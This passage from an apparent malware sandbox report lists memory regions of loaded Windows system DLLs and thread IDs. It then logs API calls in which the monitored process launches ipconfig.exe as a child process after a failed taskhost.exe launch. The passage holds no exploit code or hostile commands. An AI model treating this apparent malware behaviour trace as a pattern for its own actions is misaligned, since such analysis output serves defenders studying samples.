filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 10395 start_va = 0x7fefb2e0000 end_va = 0x7fefb406fff monitored = 0 entry_point = 0x7fefb2e10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 10396 start_va = 0x7fefb510000 end_va = 0x7fefb518fff monitored = 0 entry_point = 0x7fefb511010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 10397 start_va = 0x7fefb520000 end_va = 0x7fefb54bfff monitored = 0 entry_point = 0x7fefb5215c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 10398 start_va = 0x7fefb600000 end_va = 0x7fefb62cfff monitored = 0 entry_point = 0x7fefb601010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 10399 start_va = 0x7fefb630000 end_va = 0x7fefb63ffff monitored = 0 entry_point = 0x7fefb6395dc region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 10400 start_va = 0x7fefb640000 end_va = 0x7fefb655fff monitored = 0 entry_point = 0x7fefb641050 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 10401 start_va = 0x7fefb660000 end_va = 0x7fefb6c8fff monitored = 0 entry_point = 0x7fefb661198 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 10402 start_va = 0x7fefb750000 end_va = 0x7fefb767fff monitored = 0 entry_point = 0x7fefb751060 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 10403 start_va = 0x7fefb770000 end_va = 0x7fefb779fff monitored = 0 entry_point = 0x7fefb7749f0 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 10404 start_va = 0x7fefb780000 end_va = 0x7fefb793fff monitored = 0 entry_point = 0x7fefb7816b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10405 start_va = 0x7fefb7a0000 end_va = 0x7fefb7b4fff monitored = 0 entry_point = 0x7fefb7a1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10406 start_va = 0x7fefb7c0000 end_va = 0x7fefb7cbfff monitored = 0 entry_point = 0x7fefb7c18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10407 start_va = 0x7fefb7f0000 end_va = 0x7fefb8a9fff monitored = 0 entry_point = 0x7fefb7f115c region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 10408 start_va = 0x7fefb8b0000 end_va = 0x7fefb8f2fff monitored = 0 entry_point = 0x7fefb8b30d8 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 10409 start_va = 0x7fefb900000 end_va = 0x7fefb910fff monitored = 0 entry_point = 0x7fefb901070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 10410 start_va = 0x7fefb920000 end_va = 0x7fefb92afff monitored = 0 entry_point = 0x7fefb921030 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 10411 start_va = 0x7fefb930000 end_va = 0x7fefba59fff monitored = 0 entry_point = 0x7fefb933810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 10412 start_va = 0x7fefba60000 end_va = 0x7fefba94fff monitored = 0 entry_point = 0x7fefba61064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 10413 start_va = 0x7fefbaa0000 end_va = 0x7fefbab7fff monitored = 0 entry_point = 0x7fefbaa1130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 10414 start_va = 0x7fefbac0000 end_va = 0x7fefbb0afff monitored = 0 entry_point = 0x7fefbacefcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 10415 start_va = 0x7fefbb10000 end_va = 0x7fefbb1afff monitored = 0 entry_point = 0x7fefbb11020 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 10416 start_va = 0x7fefbb20000 end_va = 0x7fefbb5afff monitored = 0 entry_point = 0x7fefbb2f410 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 10417 start_va = 0x7fefbb60000 end_va = 0x7fefbba2fff monitored = 0 entry_point = 0x7fefbb6c168 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 10418 start_va = 0x7fefbbb0000 end_va = 0x7fefbca1fff monitored = 0 entry_point = 0x7fefbbdac20 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 10419 start_va = 0x7fefbcb0000 end_va = 0x7fefbec4fff monitored = 0 entry_point = 0x7fefbe864b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 10420 start_va = 0x7fefbed0000 end_va = 0x7fefbf25fff monitored = 0 entry_point = 0x7fefbedbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 10421 start_va = 0x7fefbf30000 end_va = 0x7fefc05bfff monitored = 0 entry_point = 0x7fefbf394bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 10422 start_va = 0x7fefc060000 end_va = 0x7fefc07cfff monitored = 0 entry_point = 0x7fefc061ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10423 start_va = 0x7fefc080000 end_va = 0x7fefc0a3fff monitored = 0 entry_point = 0x7fefc081024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 10424 start_va = 0x7fefc0b0000 end_va = 0x7fefc2a3fff monitored = 0 entry_point = 0x7fefc23c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 10425 start_va = 0x7fefc2b0000 end_va = 0x7fefc3b9fff monitored = 0 entry_point = 0x7fefc2b1010 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 10426 start_va = 0x7fefc3c0000 end_va = 0x7fefc599fff monitored = 0 entry_point = 0x7fefc3c3130 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 10427 start_va = 0x7fefc740000 end_va = 0x7fefc74bfff monitored = 0 entry_point = 0x7fefc741064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 10428 start_va = 0x7fefc920000 end_va = 0x7fefc93dfff monitored = 0 entry_point = 0x7fefc9213b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 10429 start_va = 0x7fefcb70000 end_va = 0x7fefcbb6fff monitored = 0 entry_point = 0x7fefcb71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 10430 start_va = 0x7fefce70000 end_va = 0x7fefce87fff monitored = 0 entry_point = 0x7fefce73b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 10431 start_va = 0x7fefcf80000 end_va = 0x7fefcfb1fff monitored = 0 entry_point = 0x7fefcf8144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 10432 start_va = 0x7fefd0a0000 end_va = 0x7fefd10cfff monitored = 0 entry_point = 0x7fefd0a1010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 10433 start_va = 0x7fefd370000 end_va = 0x7fefd392fff monitored = 0 entry_point = 0x7fefd371198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10434 start_va = 0x7fefd410000 end_va = 0x7fefd41afff monitored = 0 entry_point = 0x7fefd411030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 10435 start_va = 0x7fefd440000 end_va = 0x7fefd464fff monitored = 0 entry_point = 0x7fefd449658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 10436 start_va = 0x7fefd470000 end_va = 0x7fefd47efff monitored = 0 entry_point = 0x7fefd471010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 10437 start_va = 0x7fefd480000 end_va = 0x7fefd510fff monitored = 0 entry_point = 0x7fefd481440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 10438 start_va = 0x7fefd520000 end_va = 0x7fefd55cfff monitored = 0 entry_point = 0x7fefd5218f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 10439 start_va = 0x7fefd560000 end_va = 0x7fefd573fff monitored = 0 entry_point = 0x7fefd5610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 10440 start_va = 0x7fefd580000 end_va = 0x7fefd58efff monitored = 0 entry_point = 0x7fefd5819b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 10441 start_va = 0x7fefd620000 end_va = 0x7fefd62efff monitored = 0 entry_point = 0x7fefd621020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 10442 start_va = 0x7fefd630000 end_va = 0x7fefd649fff monitored = 0 entry_point = 0x7fefd631558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 10443 start_va = 0x7fefd650000 end_va = 0x7fefd68afff monitored = 0 entry_point = 0x7fefd651324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 10444 start_va = 0x7fefd690000 end_va = 0x7fefd6c5fff monitored = 0 entry_point = 0x7fefd691474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 10445 start_va = 0x7fefd6d0000 end_va = 0x7fefd83cfff monitored = 0 entry_point = 0x7fefd6d10b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 10446 start_va = 0x7fefd8e0000 end_va = 0x7fefd94bfff monitored = 0 entry_point = 0x7fefd8e2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10447 start_va = 0x7fefd970000 end_va = 0x7fefdae7fff monitored = 0 entry_point = 0x7fefd9710e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 10448 start_va = 0x7fefdaf0000 end_va = 0x7fefdcc6fff monitored = 0 entry_point = 0x7fefdaf1010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 10449 start_va = 0x7fefdd50000 end_va = 0x7fefead7fff monitored = 0 entry_point = 0x7fefddccebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 10450 start_va = 0x7fefeae0000 end_va = 0x7fefece2fff monitored = 0 entry_point = 0x7fefeb03330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10451 start_va = 0x7fefecf0000 end_va = 0x7fefee1cfff monitored = 0 entry_point = 0x7fefed3ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10452 start_va = 0x7fefeec0000 end_va = 0x7fefeeedfff monitored = 0 entry_point = 0x7fefeec1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10453 start_va = 0x7fefeef0000 end_va = 0x7fefeefdfff monitored = 0 entry_point = 0x7fefeef1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10454 start_va = 0x7fefef00000 end_va = 0x7feff029fff monitored = 0 entry_point = 0x7fefef010d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 10455 start_va = 0x7feff030000 end_va = 0x7feff106fff monitored = 0 entry_point = 0x7feff033274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10456 start_va = 0x7feff110000 end_va = 0x7feff368fff monitored = 0 entry_point = 0x7feff111340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 10457 start_va = 0x7feff370000 end_va = 0x7feff44afff monitored = 0 entry_point = 0x7feff390760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10458 start_va = 0x7feff450000 end_va = 0x7feff457fff monitored = 0 entry_point = 0x7feff451504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10459 start_va = 0x7feff460000 end_va = 0x7feff4d0fff monitored = 0 entry_point = 0x7feff471e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 10460 start_va = 0x7feff4e0000 end_va = 0x7feff52cfff monitored = 0 entry_point = 0x7feff4e1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10461 start_va = 0x7feff530000 end_va = 0x7feff581fff monitored = 0 entry_point = 0x7feff5310d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 10462 start_va = 0x7feff590000 end_va = 0x7feff628fff monitored = 0 entry_point = 0x7feff591c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 10463 start_va = 0x7feff630000 end_va = 0x7feff696fff monitored = 0 entry_point = 0x7feff63b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10464 start_va = 0x7feff6a0000 end_va = 0x7feff7a8fff monitored = 0 entry_point = 0x7feff6a1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10465 start_va = 0x7feff7b0000 end_va = 0x7feff84efff monitored = 0 entry_point = 0x7feff7b25a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10466 start_va = 0x7feff850000 end_va = 0x7feff918fff monitored = 0 entry_point = 0x7feff8ca874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10467 start_va = 0x7feff920000 end_va = 0x7feff93efff monitored = 0 entry_point = 0x7feff9260e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10468 start_va = 0x7feff950000 end_va = 0x7feff950fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10469 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 10470 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 10471 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 10472 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 10473 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 10474 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 10475 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 10476 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 10477 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 10478 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 10479 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 10480 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 10481 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 10482 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 10483 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 10484 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 10485 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 10486 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 10487 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 10488 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 10489 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 10490 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 10491 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 10492 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 10493 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 10494 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 10495 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10496 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 10497 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 10498 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 10499 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 10500 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 10501 start_va = 0x7fffffde000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10606 start_va = 0x9310000 end_va = 0xae67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009310000" filename = "" Region: id = 10617 start_va = 0x7120000 end_va = 0x722bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007120000" filename = "" Thread: id = 74 os_tid = 0x428 Thread: id = 75 os_tid = 0x650 Thread: id = 76 os_tid = 0x64c Thread: id = 77 os_tid = 0x648 Thread: id = 78 os_tid = 0x640 Thread: id = 79 os_tid = 0x62c Thread: id = 80 os_tid = 0x604 Thread: id = 81 os_tid = 0x5dc Thread: id = 82 os_tid = 0x5d8 Thread: id = 83 os_tid = 0x5d4 Thread: id = 84 os_tid = 0x5bc Thread: id = 85 os_tid = 0x584 Thread: id = 86 os_tid = 0x58c Thread: id = 87 os_tid = 0x570 Thread: id = 88 os_tid = 0x568 Thread: id = 89 os_tid = 0x564 Thread: id = 90 os_tid = 0x560 Thread: id = 91 os_tid = 0x550 Thread: id = 92 os_tid = 0x544 Thread: id = 93 os_tid = 0x52c Thread: id = 94 os_tid = 0x528 Thread: id = 95 os_tid = 0x524 Thread: id = 96 os_tid = 0x520 Thread: id = 97 os_tid = 0x51c Thread: id = 98 os_tid = 0x4f4 Thread: id = 99 os_tid = 0x4f0 Thread: id = 100 os_tid = 0x4ec Thread: id = 101 os_tid = 0x4d0 Thread: id = 102 os_tid = 0x4b0 Thread: id = 103 os_tid = 0x4ac Thread: id = 104 os_tid = 0x49c Thread: id = 105 os_tid = 0x498 Thread: id = 106 os_tid = 0x494 Thread: id = 107 os_tid = 0x468 Thread: id = 108 os_tid = 0x458 [0263.432] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\taskhost.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x28f418*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f3f0, hNewToken=0x0 | out: lpProcessInformation=0x28f3f0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0), hNewToken=0x0) returned 0 [0263.432] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\ipconfig.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x28f418*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f3f0, hNewToken=0x0 | out: lpProcessInformation=0x28f3f0*(hProcess=0xb3c, hThread=0x9f8, dwProcessId=0x350, dwThreadId=0x5c4), hNewToken=0x0) returned 1 Process: id = "10" image_name = "ipconfig.exe" filename = "c:\\windows\\syswow64\\ipconfig.exe" page_root = "0x6d604000" os_pid = "0x350" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x454" cmd_line = "\"C:\\Windows\\SysWOW64\\ipconfig.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed78" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10505 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10506 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10507 start_va = 0x40000 end_va = 